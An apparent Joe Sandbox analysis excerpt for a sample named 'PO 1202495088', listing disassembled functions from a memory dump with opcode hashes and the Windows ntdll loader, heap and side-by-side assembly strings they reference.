                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                          • API String ID: 0-4098886588
                                                                                          • Opcode ID: 6b46611efdd74dca05c6dff5e972319df817396d0d4f2947d98b9dd19d0d5cea
                                                                                          • Instruction ID: 5344d1802cf401bd756aa4d88e95782aec9fdd79bbd633aa4c36e678ffeedb37
                                                                                          • Opcode Fuzzy Hash: 6b46611efdd74dca05c6dff5e972319df817396d0d4f2947d98b9dd19d0d5cea
                                                                                          • Instruction Fuzzy Hash: F832B47090426D8BDB22CF18CC94BEEBBB9BF44348F1441E6DA49A7655EB319E81CF40
                                                                                          Function 013E631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-792281065
                                                                                          • Opcode ID: 9ce47a8d1b059776c7aa0fe8587f9fb23fef1a43118f946ae8f8721a2804dd5f
                                                                                          • Instruction ID: 128707bd589fc6c4e6dc3b951326c122f1dd1d13ac7330cfdeb26959b999d636
                                                                                          • Opcode Fuzzy Hash: 9ce47a8d1b059776c7aa0fe8587f9fb23fef1a43118f946ae8f8721a2804dd5f
                                                                                          • Instruction Fuzzy Hash: 599158B0A01735DBDB359F18D80ABAA7FA5FB24B18F85402EE6056B3F1D7749881C790
                                                                                          Function 013A640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0140977C
                                                                                          • apphelp.dll, xrefs: 013A6446
                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014097B9
                                                                                          • LdrpInitShimEngine, xrefs: 01409783, 01409796, 014097BF
                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01409790
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 014097A0, 014097C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-204845295
                                                                                          • Opcode ID: b88af33fcc91c6e6a4c7871cd2e3a73c2ac030ca818e47b6e9d75004eedd5180
                                                                                          • Instruction ID: 99abeb1239862bf6f8453273d3a44222652863247a018712fd87e2aef5e4b5c9
                                                                                          • Opcode Fuzzy Hash: b88af33fcc91c6e6a4c7871cd2e3a73c2ac030ca818e47b6e9d75004eedd5180
                                                                                          • Instruction Fuzzy Hash: 7E51F771204305DFE721DF25D891F6B7BE8FB9460CF84452EF589972A1E630D904CB92
                                                                                          Function 013E2594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01421F6A, 01421FA4, 01421FC4
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01421F8A
                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01421FA9
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01421FC9
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01421F82
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01421F6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                          • API String ID: 0-861424205
                                                                                          • Opcode ID: 014ffe175348bd566921cf657912ca118b4c0f6ccb08235de25d1fb88232d2ff
                                                                                          • Instruction ID: fb15272243452dcd16da48916303a55ba1356b9177242ff1da9d1532684bbfa4
                                                                                          • Opcode Fuzzy Hash: 014ffe175348bd566921cf657912ca118b4c0f6ccb08235de25d1fb88232d2ff
                                                                                          • Instruction Fuzzy Hash: 6C31FD72B003357BEB205A8B8C59F5B7AACDB64E58F06415AFA1077394C3B0AE41CAD0
                                                                                          Function 013EC5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpInitializeProcess, xrefs: 013EC5E4
                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 01427FF0
                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01427F7B
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01427F8C, 01428000
                                                                                          • LdrpInitializeImportRedirection, xrefs: 01427F82, 01427FF6
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 013EC5E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                          • API String ID: 0-475462383
                                                                                          • Opcode ID: 0f43abed8c677a8809fbae0dce338b008e1697da53d74bd393cf596dfaffad55
                                                                                          • Instruction ID: a2d4bc186a0dd57e784ba1490ad72d80105cd8943aa217d77b11931934baec84
                                                                                          • Opcode Fuzzy Hash: 0f43abed8c677a8809fbae0dce338b008e1697da53d74bd393cf596dfaffad55
                                                                                          • Instruction Fuzzy Hash: AB31C4B16043529BC324EF2DD845E2BBBD4EFA4B18F45455DF9846B3A1E630DC048792
                                                                                          Function 01434BC0 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                          • API String ID: 0-2518169356
                                                                                          • Opcode ID: e5d7edf26e8c5d5bc3aa43c5876ff843853aa74a9968ec503387fcd3b1a5265d
                                                                                          • Instruction ID: 428a763286875ec517339deae134d162d2630e54e5502952657bcca70a8b3fb8
                                                                                          • Opcode Fuzzy Hash: e5d7edf26e8c5d5bc3aa43c5876ff843853aa74a9968ec503387fcd3b1a5265d
                                                                                          • Instruction Fuzzy Hash: 7291C076E006198BCB25CF9CC881AEEBBF0EF89714F19416AE911E7360D775D902CB90
                                                                                          Function 013BA2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                          • API String ID: 0-379654539
                                                                                          • Opcode ID: 6b1b88055ded257fbe491fae13ba0d005b1a900badbc0e0f1aa758d41d380b33
                                                                                          • Instruction ID: 2d4f7157edae4759cb5dff4eca489bac24b06c9cb32824d2ec6e46b54b4f309a
                                                                                          • Opcode Fuzzy Hash: 6b1b88055ded257fbe491fae13ba0d005b1a900badbc0e0f1aa758d41d380b33
                                                                                          • Instruction Fuzzy Hash: 79C16D71108786CFD721CF18C080BAAB7E4BF84748F04496AFA95DBB51E778CA49CB56
                                                                                          Function 013E8322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpInitializeProcess, xrefs: 013E8342
                                                                                          • @, xrefs: 013E84B1
                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013E847E
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 013E8341
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1918872054
                                                                                          • Opcode ID: 318e944c682dbc5bf007a723fd94db5e13929f2df06dab2f0ef8b1071b257a08
                                                                                          • Instruction ID: 26ba8a044b6aa0e3cc60f184161d0ccb921a84c3216ab9e708d9336cbaecf05e
                                                                                          • Opcode Fuzzy Hash: 318e944c682dbc5bf007a723fd94db5e13929f2df06dab2f0ef8b1071b257a08
                                                                                          • Instruction Fuzzy Hash: 24919E71608355AFE721DF69C844FABBBECEB84748F40096EFA8492191E734D944CB62
                                                                                          Function 013C0B10 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 014152DE, 0141539F
                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 014153BB
                                                                                          • HEAP: , xrefs: 014152ED, 014153AE
                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 014152FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                          • API String ID: 0-1657114761
                                                                                          • Opcode ID: 07ccf885162e40f5c7685b6cf61fb7c74c65f3e591c9df88c2866bda181626ef
                                                                                          • Instruction ID: dc1ae80032a1cd6b338f1f7d13f6e20ea875f8bf1333e71ebec97e14da7d89b1
                                                                                          • Opcode Fuzzy Hash: 07ccf885162e40f5c7685b6cf61fb7c74c65f3e591c9df88c2866bda181626ef
                                                                                          • Instruction Fuzzy Hash: A4A1033460038ADBDB29CF28C450BBABBA5EF54B08F14856DE49A8B756D730ED41C791
                                                                                          Function 013E265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014220C0
                                                                                          • .Local, xrefs: 013E27F8
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01421FE8
                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01421FE3, 014220BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                          • API String ID: 0-1239276146
                                                                                          • Opcode ID: a8aab938003faf849fb4e044e0b31fc8afb91578157c197b1f75a6097b2e3305
                                                                                          • Instruction ID: cb5e29e71ea8c0915c1c3b6687403eec5e3f586e2293cd874609c312ff2c0451
                                                                                          • Opcode Fuzzy Hash: a8aab938003faf849fb4e044e0b31fc8afb91578157c197b1f75a6097b2e3305
                                                                                          • Instruction Fuzzy Hash: 71A1917194032D9BDB24CF58C888B9AB7B9BF58318F1501EAE908A7391D7749E85CF90
                                                                                          Function 013E49F0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RtlDeactivateActivationContext, xrefs: 0142322F, 0142323C, 0142325B
                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01423234
                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01423241
                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01423260
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                          • API String ID: 0-1245972979
                                                                                          • Opcode ID: e2988ff7292eebb78f6330e16fbf12ad6042a4784af4f141cdf5c6db6ab34838
                                                                                          • Instruction ID: 01b563ea755c1357428caeace29a44d09daaf238364fc32d3bc494bfca3d6965
                                                                                          • Opcode Fuzzy Hash: e2988ff7292eebb78f6330e16fbf12ad6042a4784af4f141cdf5c6db6ab34838
                                                                                          • Instruction Fuzzy Hash: 9D6125326407229BEB22CF1DC885B26B7E4FF99B24F54851EE955DB390C734E841CBA1
                                                                                          Function 013B63CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01410E72
                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01410EB5
                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01410DEC
                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01410E2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                          • API String ID: 0-1468400865
                                                                                          • Opcode ID: 1ba86fbb79fbc7e86c6e6ad4aa8b64d800ce2e4143bc57f2b10075d67965b8c7
                                                                                          • Instruction ID: 66899bc2fb189da831ad8b860f9768cc12d91a6ec4807adb3e9a3e064fd141dc
                                                                                          • Opcode Fuzzy Hash: 1ba86fbb79fbc7e86c6e6ad4aa8b64d800ce2e4143bc57f2b10075d67965b8c7
                                                                                          • Instruction Fuzzy Hash: D47121B19047059FCB21DF19C8C1B9B3FA9EF94768F400469FA489B697D334D588CB91
                                                                                          Function 01460D24 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                          • API String ID: 0-336120773
                                                                                          • Opcode ID: 975baf96d64b55610343a27ca4c2a54aaa36e40fd5d3dc7972ab50868ec1ee7f
                                                                                          • Instruction ID: 6cece44a0c4061b9297ca8ae4d0d4d106d03723ddb2958f632d4afcc7d31491b
                                                                                          • Opcode Fuzzy Hash: 975baf96d64b55610343a27ca4c2a54aaa36e40fd5d3dc7972ab50868ec1ee7f
                                                                                          • Instruction Fuzzy Hash: 94314231250214EFD711DB2CDC84F6BB7ACEF04B6CF14055AF502CB2A0EA71A941CB62
                                                                                          Function 013D237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpDynamicShimModule, xrefs: 0141A7A5
                                                                                          • apphelp.dll, xrefs: 013D2382
                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0141A79F
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0141A7AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-176724104
                                                                                          • Opcode ID: 89156bfc11e472e282e5619ae073c87335a0e8815de6079461576011e83fb8e4
                                                                                          • Instruction ID: 683d0aac577731d37dff90c8487257b8b47e9ef5e256131e717f4720aaf77b63
                                                                                          • Opcode Fuzzy Hash: 89156bfc11e472e282e5619ae073c87335a0e8815de6079461576011e83fb8e4
                                                                                          • Instruction Fuzzy Hash: 2A315B72A01241EBEB319F1DD881A6F7BB4FB80B04F6A401EE90167379EB709942C750
                                                                                          Function 013C28C0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 013C3175
                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013C319D
                                                                                          • HEAP: , xrefs: 013C3184
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                          • API String ID: 0-617086771
                                                                                          • Opcode ID: 965929abeb8602f50de23f9159d36ff3567707c7e82c7dfe2285ecc1c1dba110
                                                                                          • Instruction ID: e61a145d238632fddbad986ae5820cb5c34be957faa937cbb5c61de540e6ece7
                                                                                          • Opcode Fuzzy Hash: 965929abeb8602f50de23f9159d36ff3567707c7e82c7dfe2285ecc1c1dba110
                                                                                          • Instruction Fuzzy Hash: 1292BB31A042499FDB25CF68C444BAEBBF1FF48B08F18809DE85AAB691D735AD45CF50
                                                                                          Function 013C0680 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-4253913091
                                                                                          • Opcode ID: 816bf54cafe654aba6020cb55ad52b667b3c475b82a07bae639d0984f62bf3c5
                                                                                          • Instruction ID: 234df15cb5d0915eb575e4858a1e2b2cc83180cccba9999b5dcf598713113d47
                                                                                          • Opcode Fuzzy Hash: 816bf54cafe654aba6020cb55ad52b667b3c475b82a07bae639d0984f62bf3c5
                                                                                          • Instruction Fuzzy Hash: 74F1EE74600646DFDB19CF68C894BAABBB5FF44B08F14816EE4069B7A5D730ED81CB90
                                                                                          Function 013D6882 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: $@
                                                                                          • API String ID: 2994545307-1077428164
                                                                                          • Opcode ID: 5cd7238fdfced4ed1e25a45df6cef35fa9d276384ec6853125a2f49ebffb9eec
                                                                                          • Instruction ID: 6f0cd17917fec469e55d9e3b8e093eb626b50ebeaa9103029cc485fffa976199
                                                                                          • Opcode Fuzzy Hash: 5cd7238fdfced4ed1e25a45df6cef35fa9d276384ec6853125a2f49ebffb9eec
                                                                                          • Instruction Fuzzy Hash: 8CC292726083419FD725CF28D881BABBBE5BF88718F04892EF999C7251D734D845CB92
                                                                                          Function 013AA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                          • API String ID: 0-2779062949
                                                                                          • Opcode ID: 8286b4cdf58e9795796d0f710c2dac9608c892d76579de632a4ce616ffb975a3
                                                                                          • Instruction ID: 9044689b9a54c06e9e882d06f99ca79a32f5d4abdbb0793d29d7d4658f09a3bd
                                                                                          • Opcode Fuzzy Hash: 8286b4cdf58e9795796d0f710c2dac9608c892d76579de632a4ce616ffb975a3
                                                                                          • Instruction Fuzzy Hash: E8A15172911229DBDB32DF68CC88B9AB7B4EF04714F1001EAE909A7250D735AE85CF50
                                                                                          Function 013D0AEB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpCheckModule, xrefs: 01419F24
                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 01419F1C
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01419F2E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-161242083
                                                                                          • Opcode ID: 57a00d69f0eb4b2702d17f54336c3127c4f98f31d9dc7a49cba3069b7c36d620
                                                                                          • Instruction ID: 2bcdcefb837c81e14227c9d94afcf065e8b762aae045bcc418f09703e9055aab
                                                                                          • Opcode Fuzzy Hash: 57a00d69f0eb4b2702d17f54336c3127c4f98f31d9dc7a49cba3069b7c36d620
                                                                                          • Instruction Fuzzy Hash: B071D072A002059FDB29DF6CD890ABEBBF4EB44A0CF19406EE506A7765E730A941CB50
                                                                                          Function 013C096B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-1334570610
                                                                                          • Opcode ID: 860247d49c695c97b84de097b2c516ffdf9699dfbe76cd110aa438c1cdc2f985
                                                                                          • Instruction ID: 1a8fa04c2ae609537395108cf4d2178ddaa07c953f81d170a14d76e903a298d3
                                                                                          • Opcode Fuzzy Hash: 860247d49c695c97b84de097b2c516ffdf9699dfbe76cd110aa438c1cdc2f985
                                                                                          • Instruction Fuzzy Hash: 6F61C079600345DFEB29CF28C880BA6BBE5FF45708F14855EE84A8F666D770E841CB91
                                                                                          Function 013EC640 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Failed to reallocate the system dirs string !, xrefs: 014280E2
                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 014280E9
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 014280F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1783798831
                                                                                          • Opcode ID: 6d619397987565d30602dbf0079a81951761e149362bf2e532b152d06db41576
                                                                                          • Instruction ID: 2bf76daaa407e932777b584f61001cc4aef79280a4bbce60b5ba7bcb9ed135c4
                                                                                          • Opcode Fuzzy Hash: 6d619397987565d30602dbf0079a81951761e149362bf2e532b152d06db41576
                                                                                          • Instruction Fuzzy Hash: 1141C671540311ABD721EF68DC44B5F7BE8EF54A68F46582EF948972A1EB70E800CB91
                                                                                          Function 014343D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01434508
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01434519
                                                                                          • LdrpCheckRedirection, xrefs: 0143450F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                          • API String ID: 0-3154609507
